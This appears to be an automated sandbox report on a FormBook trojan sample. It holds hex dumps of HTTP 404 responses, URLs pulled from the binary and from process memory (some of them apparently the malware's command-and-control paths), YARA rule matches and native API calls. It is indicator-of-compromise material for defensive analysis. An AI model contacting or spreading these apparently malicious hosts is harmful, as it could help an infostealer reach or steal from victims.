32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 01 Jul 2024 17:26:15 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 01 Jul 2024 17:26:17 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 01 Jul 2024 17:26:20 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 17:27:01 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 32 30 30 30 0d 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 7a 68 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6c 69 67 68 74 20 64 61 72 6b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 66 66 66 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 0d 0a 20 20 20 20 20 20 20 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 2f 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 37 20 54 68 65 20 43 68 72 6f 6d 69 75 6d 20 41 75 74 68 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2a 20 55 73 65 20 6f 66 20 74 68 69 73 20 73 6f 75 72 63 65 20 63 6f 64 65 20 69 73 20 67 6f 76 65 72 6e 65 64 20 62 79 20 61 20 42 53 44 2d 73 74 79 6c 65 20 6c 69 63 65 6e 73 65 20 74 68 61 74 20 63 61 6e 20 62 65 20 2a 20 66 6f 75 6e 64 20 69 6e 20 74 68 65 20 4c 49 43 45 4e 53 45 20 66 69 6c 65 2e 20 2a 2f 20 61 20 7b 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 6c 69 6e 6b 2d 63 6f 6c 6f 72 29 3b 20 7d 20 62 6f 64 79 20 7b 20 2d 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 2d 2d 65 72 72 6f 72 2d 63 6f 64 65 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 67 6f 6f 67 6c 65 2d 67 72 61 79 2d 37 30 30 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 62 6c 75 65 2d 31 30 30 3a 20 72 67 62 28 32 31 30 2c 20 32 32 37 2c 20 32 35 32 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 62 6c 75 65 2d 33 30 30 3a 20 72 67 62 28 31 33 38 2c 20 31 38 30 2c 20 32 34 38 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 62 6c 75 65 2d 36 30 30 3a 20 72 67 62 28 32 36 2c 20 31 31 35 2c 20 32 33 32 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 62 6c 75 65 2d 37 30 30 3a 20 72 67 62 28 32 35 2c 20 31 30 33 2c 20 32 31 30 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 67 72 61 79 2d 31 30 30 3a 20 72 67 62 28 32 34 31 2c 20 32 34 33 2c 20 32 34 34 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 67 72 61 79 2d 33 30 30 3a 20 72 67 62 28 32 31 38 2c 20 32 32 30 2c 20 32 32 34 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 67 72 61 79 2d 35 30 30 3a 20 72 67 62 28 31 35 34 2c 20 31 36 30 2c 20 31 36 36 29 3b 20 2d 2d 67 6f 6f 67 6c 65 2d 67 72 61 79 2d 35 30 3a 20 72 67 62 28 32 34

Source: chkntfs.exe, 0000000E.00000002.3707027734.0000000005B20000.00000004.10000000.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000002.3705377608.0000000004170000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://lookstudiov.com/u4jq/?Lb=GFtlIrHx8T50&FTP84=CDJU9pFFzFP5Q
Source: aj34fjqh.exe, 00000018.00000002.3098875657.0000000003151000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 8hd98EhtIFcYkb8.exe	String found in binary or memory: http://www.opcom.ro/rapoarte/export_csv_raportPIPsiVolumTranzactionat_PI.php?zi=
Source: 8hd98EhtIFcYkb8.exe	String found in binary or memory: http://www.opcom.ro/rapoarte/export_xml_PIPsiVolTranPI.php?zi=
Source: xQUrWfQeELsQZII.exe, 00000010.00000002.3708009401.00000000058AA000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.xn--gotopia-bya.com
Source: xQUrWfQeELsQZII.exe, 00000010.00000002.3708009401.00000000058AA000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.xn--gotopia-bya.com/ynea/
Source: chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chkntfs.exe, 0000000E.00000002.3707027734.000000000648C000.00000004.10000000.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000002.3705377608.0000000004ADC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://img.sedoparking.com/templates/bg/NameSiloLogo.png
Source: chkntfs.exe, 0000000E.00000002.3694875633.0000000002A1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: chkntfs.exe, 0000000E.00000002.3694875633.00000000029F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: chkntfs.exe, 0000000E.00000002.3694875633.0000000002A1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: chkntfs.exe, 0000000E.00000002.3694875633.00000000029F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: chkntfs.exe, 0000000E.00000003.1612857015.0000000007945000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: chkntfs.exe, 0000000E.00000002.3707027734.00000000062FA000.00000004.10000000.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000002.3705377608.000000000494A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.cvt-auto.ru/1cpo/?FTP84=XWpmZSZkQQ3crjSg4jO9FnvqfvQgDjUUlmKrUzlk
Source: chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: chkntfs.exe, 0000000E.00000003.1618293298.0000000007968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chkntfs.exe, 0000000E.00000002.3709714748.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3707027734.000000000648C000.00000004.10000000.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000002.3705377608.0000000004ADC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.namesilo.com
Source: chkntfs.exe, 0000000E.00000002.3709714748.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3707027734.000000000648C000.00000004.10000000.00040000.00000000.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000002.3705377608.0000000004ADC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.namesilo.com/domain/search-domains?query=ridcoredry.live
Source: xQUrWfQeELsQZII.exe, 00000010.00000002.3705377608.0000000004ADC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.sedo.com/services/parking.php3

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 25.2.aj34fjqh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.aj34fjqh.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1431852540.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3534960934.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3530426239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3705299437.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3708009401.0000000005850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3705534069.0000000004500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1433410329.00000000020C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3705085363.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 25.2.aj34fjqh.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 25.2.aj34fjqh.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.1431852540.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000019.00000002.3534960934.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000019.00000002.3530426239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.3705299437.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.3708009401.0000000005850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.3705534069.0000000004500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.1433410329.00000000020C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.3705085363.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Contains functionality to call native functions

Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_0042B533 NtClose,	3_2_0042B533
Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 3_2_012E2B60 NtClose,LdrInitializeThunk,	3_2_012E2B60
